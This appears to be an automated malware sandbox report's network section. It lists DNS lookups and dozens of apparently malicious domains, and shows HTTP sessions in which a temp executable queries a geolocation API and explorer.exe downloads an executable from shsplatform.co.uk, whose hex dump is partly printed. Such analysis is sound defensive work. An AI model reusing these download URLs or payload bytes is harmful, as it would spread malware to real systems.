                                                                                                  Jun 21, 2023 20:24:50.425508022 CEST8.8.8.8192.168.2.40x4e89No error (0)toobussy.com201.124.31.170A (IP address)IN (0x0001)false
                                                                                                  Jun 21, 2023 20:24:50.425508022 CEST8.8.8.8192.168.2.40x4e89No error (0)toobussy.com190.231.153.132A (IP address)IN (0x0001)false
                                                                                                  Jun 21, 2023 20:24:50.831327915 CEST8.8.8.8192.168.2.40x307eNo error (0)as.imgjeoigaa.com39.109.117.57A (IP address)IN (0x0001)false
                                                                                                  Jun 21, 2023 20:24:53.385235071 CEST8.8.8.8192.168.2.40x5cfdNo error (0)as.imgjeoigaa.com39.109.117.57A (IP address)IN (0x0001)false
                                                                                                  • api.2ip.ua
                                                                                                  • astoriaresidency.com
                                                                                                  • shsplatform.co.uk
                                                                                                  • xsrefr.net
                                                                                                    • potunulit.org
                                                                                                  • vmunha.org
                                                                                                  • colisumy.com
                                                                                                  • abbieik.net
                                                                                                  • twffpt.net
                                                                                                  • posgj.com
                                                                                                  • fxdusu.org
                                                                                                  • txpvrw.com
                                                                                                  • cnrubgqxe.com
                                                                                                  • nkgvgdoeib.net
                                                                                                  • gtvwjmn.com
                                                                                                  • qrtajytrq.net
                                                                                                  • pracwvkxcx.net
                                                                                                  • zexeq.com
                                                                                                  • 45.9.74.80
                                                                                                  • guticvumry.com
                                                                                                  • hlvbrwqaym.net
                                                                                                  • doogjdva.com
                                                                                                  • mdxqlp.org
                                                                                                  • fqpjv.org
                                                                                                  • edswtiwran.com
                                                                                                  • avagk.com
                                                                                                  • ekrokkyh.org
                                                                                                  • us.imgjeoigaa.com
                                                                                                  • ohekid.net
                                                                                                  • gliyf.net
                                                                                                  • ddkeivkauy.net
                                                                                                    • toobussy.com
                                                                                                  • geqxiqye.com
                                                                                                  • uchjq.org
                                                                                                  • ijkkn.net
                                                                                                  • ueyvf.org
                                                                                                  • vwgtd.net
                                                                                                  • ikayx.net
                                                                                                  • locgo.net
                                                                                                  • qmhiudo.com
                                                                                                  • wllfdrn.org
                                                                                                  • axpbq.org
                                                                                                  • hhvrftyg.net
                                                                                                  • cuolikyb.org
                                                                                                  • ckaets.com
                                                                                                  • qjpgpfxidh.com
                                                                                                  • as.imgjeoigaa.com
                                                                                                  • jeurjivh.org
                                                                                                  • umhlphjsj.net
                                                                                                  • ppqeamjdcq.com
                                                                                                  • tgehtfbmpd.org
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.449698162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:23:46 UTC0OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:23:46 UTC0INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:23:46 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:23:46 UTC0INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.449699162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:23:47 UTC1OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:23:47 UTC1INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:23:47 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:23:47 UTC1INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  10192.168.2.449729162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:24:17 UTC229OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:24:17 UTC229INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:24:17 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:24:17 UTC229INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  11192.168.2.449730162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:24:18 UTC230OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:24:18 UTC230INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:24:18 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:24:18 UTC230INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  12192.168.2.449732162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:24:19 UTC231OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:24:19 UTC231INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:24:19 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:24:19 UTC232INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  13192.168.2.44974280.66.203.53443C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:24:31 UTC232OUTGET /tmp/index.php HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Host: shsplatform.co.uk
                                                                                                  2023-06-21 18:24:31 UTC232INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 21 Jun 2023 18:24:31 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Description: File Transfer
                                                                                                  Content-Disposition: attachment; filename=0c12383f.exe
                                                                                                  Content-Transfer-Encoding: binary
                                                                                                  Expires: 0
                                                                                                  Cache-Control: must-revalidate
                                                                                                  Pragma: public
                                                                                                  Connection: close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: application/octet-stream
                                                                                                  2023-06-21 18:24:31 UTC233INData Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8a dd 99 f5 ce bc f7 a6 ce bc f7 a6 ce bc f7 a6 5d f2 6f a6 cf bc f7 a6 a1 ca 69 a6 da bc f7 a6 a1 ca 5d a6 a0 bc f7 a6 a1 ca 5c a6 ec bc f7 a6 c7 c4 64 a6 cb bc f7 a6 ce bc f6 a6 b1 bc f7 a6 a1 ca 58 a6 cf bc f7 a6 a1 ca 6d a6 cf bc f7 a6 a1 ca 6a a6 cf bc f7 a6 52 69 63 68 ce bc f7 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50
                                                                                                  Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$]oi]\dXmjRichP
                                                                                                  2023-06-21 18:24:31 UTC240INData Raw: 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 20 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 27 00 00 00 20 43 6c 61 73 73 20 48 69 65 72 61 72 63 68 79 20 44 65 73 63 72 69 70 74 6f 72 27 00 00 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 41 72 72 61 79 27 00
                                                                                                  Data Ascii: PQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ Complete Object Locator' Class Hierarchy Descriptor' Base Class Array'
                                                                                                  2023-06-21 18:24:31 UTC241INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC241INData Raw: 32 30 30 30 0d 0a 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 64 79 6e 61 6d 69 63 20 61 74 65 78 69 74 20 64 65 73 74 72 75 63 74 6f 72 20 66 6f 72 20 27 00 00 00 00 60 64 79 6e 61 6d 69 63 20 69 6e 69 74 69 61 6c 69 7a 65 72 20 66 6f 72 20 27 00 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27
                                                                                                  Data Ascii: 2000 constructor iterator'`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh vector copy constructor iterator'
                                                                                                  2023-06-21 18:24:31 UTC249INData Raw: e8 3f 0f 00 00 c7
                                                                                                  Data Ascii: ?
                                                                                                  2023-06-21 18:24:31 UTC249INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC249INData Raw: 32 30 30 30 0d 0a 00 16 00 00 00 e8 d2 20 00 00 38 5d d0 74 07 8b 45 cc 83 60 70 fd 33 c0 33 d2 e9 4f 02 00 00 39 5d 14 74 0c 83 7d 14 02 7c d0 83 7d 14 24 7f ca 8a 08 56 8b 75 c4 57 89 5d ec 89 5d f0 88 4d ff 8d 78 01 83 be ac 00 00 00 01 7e 18 8d 45 c4 50 0f b6 45 ff 6a 08 50 e8 3e 1e 00 00 8b 75 c4 83 c4 0c eb 11 0f b6 45 ff 8b 8e c8 00 00 00 0f b7 04 41 83 e0 08 3b c3 74 08 8a 07 88 45 ff 47 eb c2 80 7d ff 2d 89 7d f8 75 06 83 4d 18 02 eb 06 80 7d ff 2b 75 09 8a 07 47 89 7d f8 88 45 ff 6a 10 59 39 5d 14 75 25 80 7d ff 30 74 09 c7 45 14 0a 00 00 00 eb 37 8a 07 3c 78 74 0d 3c 58 74 09 c7 45 14 08 00 00 00 eb 24 89 4d 14 39 4d 14 75 1c 80 7d ff 30 75 16 8a 07 3c 78 74 04 3c 58 75 0c 8a 47 01 83 c7 02 88 45 ff 89 7d f8 8b 45 14 99 52 8b f8 57 6a ff 6a ff
                                                                                                  Data Ascii: 2000 8]tE`p33O9]t}|}$VuW]]Mx~EPEjP>uEA;tEG}-}uM}+uG}EjY9]u%}0tE7<xt<XtE$M9Mu}0u<xt<XuGE}ERWjj
                                                                                                  2023-06-21 18:24:31 UTC257INData Raw: 8c a5 c0 fd ff ff
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC257INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC257INData Raw: 32 30 30 30 0d 0a 66 8c ad bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 45 04 8d 4d 04 89 8d f4 fd ff ff c7 85 30 fd ff ff 01 00 01 00 89 85 e8 fd ff ff 8b 49 fc 89 8d e4 fd ff ff 8b 4d 0c 89 8d e0 fc ff ff 8b 4d 10 89 8d e4 fc ff ff 89 85 ec fc ff ff ff 15 54 11 40 00 6a 00 8b f8 ff 15 50 11 40 00 8d 85 d8 fc ff ff 50 ff 15 4c 11 40 00 85 c0 75 10 85 ff 75 0c 83 fb ff 74 07 53 e8 cc 31 00 00 59 8b 4d fc 5f 33 cd 5b e8 46 2a 00 00 c9 c3 8b ff 56 6a 01 be 17 04 00 c0 56 6a 02 e8 c5 fe ff ff 83 c4 0c 56 ff 15 58 11 40 00 50 ff 15 54 10 40 00 5e c3 8b ff 55 8b ec ff 35 6c 65 47 00 ff 15 1c 11 40 00 85 c0 74 03 5d ff e0 ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 af ff ff ff cc 33 c0 50 50 50 50 50 e8 c7 ff ff ff 83 c4 14 c3 cc cc cc cc 8b 44 24 08 8b 4c 24 10 0b
                                                                                                  Data Ascii: 2000fEM0IMMT@jP@PL@uutS1YM_3[F*VjVjVX@PT@^U5leG@t]uuuuu3PPPPPD$L$
                                                                                                  2023-06-21 18:24:31 UTC265INData Raw: 00 08 00 00 89 06
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC265INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC265INData Raw: 32 30 30 30 0d 0a eb 10 8b 06 25 ff f7 ff ff 0d 00 04 00 00 eb ee 21 16 8b 01 c1 e8 02 83 e0 07 2b c3 74 15 48 74 07 48 75 1a 21 16 eb 16 8b 06 23 c2 0d 00 02 00 00 eb 09 8b 06 23 c2 0d 00 03 00 00 89 06 39 5d 20 74 07 d9 41 50 d9 1f eb 05 dd 41 50 dd 1f 5f 5e 5b 5d c3 8b ff 55 8b ec 83 ec 14 8b 45 08 53 56 33 db 8b f0 83 e6 1f 43 89 75 fc a8 08 74 14 84 5d 10 74 0f 53 e8 93 05 00 00 59 83 e6 f7 e9 92 01 00 00 a8 04 74 16 f6 45 10 04 74 10 6a 04 e8 79 05 00 00 59 83 e6 fb e9 78 01 00 00 84 c3 0f 84 9a 00 00 00 f6 45 10 08 0f 84 90 00 00 00 6a 08 e8 57 05 00 00 8b 45 10 59 b9 00 0c 00 00 23 c1 74 54 3d 00 04 00 00 74 37 3d 00 08 00 00 74 1a 3b c1 75 62 d9 ee 8b 4d 0c dc 19 df e0 dd 05 58 5d 41 00 f6 c4 05 7b 4c eb 48 d9 ee 8b 4d 0c dc 19 df e0 f6 c4 05 7b
                                                                                                  Data Ascii: 2000%!+tHtHu!##9] tAPAP_^[]UESV3Cut]tSYtEtjyYxEjWEY#tT=t7=t;ubMX]A{LHM{
                                                                                                  2023-06-21 18:24:31 UTC273INData Raw: 00 00 e8 db c0 ff
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC273INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC273INData Raw: 32 30 30 30 0d 0a ff eb d2 8b c3 c1 f8 05 8d 3c 85 a0 48 b7 01 8b f3 83 e6 1f c1 e6 06 8b 07 0f be 44 30 04 83 e0 01 74 c6 53 e8 42 04 00 00 59 83 65 fc 00 8b 07 f6 44 30 04 01 74 14 ff 75 10 ff 75 0c 53 e8 6e f8 ff ff 83 c4 0c 89 45 e4 eb 17 e8 ee ae ff ff c7 00 09 00 00 00 e8 f6 ae ff ff 83 20 00 83 4d e4 ff c7 45 fc fe ff ff ff e8 0c 00 00 00 8b 45 e4 e8 8f c9 ff ff c3 8b 5d 08 53 e8 8a 04 00 00 59 c3 8b ff 55 8b ec ff 05 74 65 47 00 68 00 10 00 00 e8 f3 eb ff ff 59 8b 4d 08 89 41 08 85 c0 74 0d 83 49 0c 08 c7 41 18 00 10 00 00 eb 11 83 49 0c 04 8d 41 14 89 41 08 c7 41 18 02 00 00 00 8b 41 08 83 61 04 00 89 01 5d c3 cc cc cc cc cc 53 56 57 8b 54 24 10 8b 44 24 14 8b 4c 24 18 55 52 50 51 51 68 60 ad 40 00 64 ff 35 00 00 00 00 a1 90 5d 41 00 33 c4 89 44
                                                                                                  Data Ascii: 2000<HD0tSBYeD0tuuSnE MEE]SYUteGhYMAtIAIAAAAa]SVWT$D$L$URPQQh`@d5]A3D
                                                                                                  2023-06-21 18:24:31 UTC281INData Raw: 07 8b 45 e4 83 60
                                                                                                  Data Ascii: E`
                                                                                                  2023-06-21 18:24:31 UTC281INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC281INData Raw: 32 30 30 30 0d 0a 70 fd 6a 03 58 eb 2f 83 f8 02 75 1c 38 5d e8 74 07 8b 45 e4 83 60 70 fd 6a 04 eb e8 f6 45 ec 01 75 ea f6 45 ec 02 75 ce 38 5d e8 74 07 8b 45 e4 83 60 70 fd 33 c0 8b 4d fc 5f 5e 33 cd 5b e8 8b ca ff ff c9 c3 8b ff 55 8b ec 83 ec 28 a1 90 5d 41 00 33 c5 89 45 fc 53 56 8b 75 08 57 ff 75 10 8b 7d 0c 8d 4d dc e8 e2 7e ff ff 8d 45 dc 50 33 db 53 53 53 53 57 8d 45 d8 50 8d 45 f0 50 e8 06 0f 00 00 89 45 ec 8d 45 f0 56 50 e8 a8 09 00 00 83 c4 28 f6 45 ec 03 75 2b 83 f8 01 75 11 38 5d e8 74 07 8b 45 e4 83 60 70 fd 6a 03 58 eb 2f 83 f8 02 75 1c 38 5d e8 74 07 8b 45 e4 83 60 70 fd 6a 04 eb e8 f6 45 ec 01 75 ea f6 45 ec 02 75 ce 38 5d e8 74 07 8b 45 e4 83 60 70 fd 33 c0 8b 4d fc 5f 5e 33 cd 5b e8 e3 c9 ff ff c9 c3 8b ff 55 8b ec 8b 4d 14 53 8b 59 0c
                                                                                                  Data Ascii: 2000pjX/u8]tE`pjEuEu8]tE`p3M_^3[U(]A3ESVuWu}M~EP3SSSSWEPEPEEVP(Eu+u8]tE`pjX/u8]tE`pjEuEu8]tE`p3M_^3[UMSY
                                                                                                  2023-06-21 18:24:31 UTC289INData Raw: bb 00 02 00 00 f6
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC289INData Raw: 0d 0a
                                                                                                  Data Ascii:
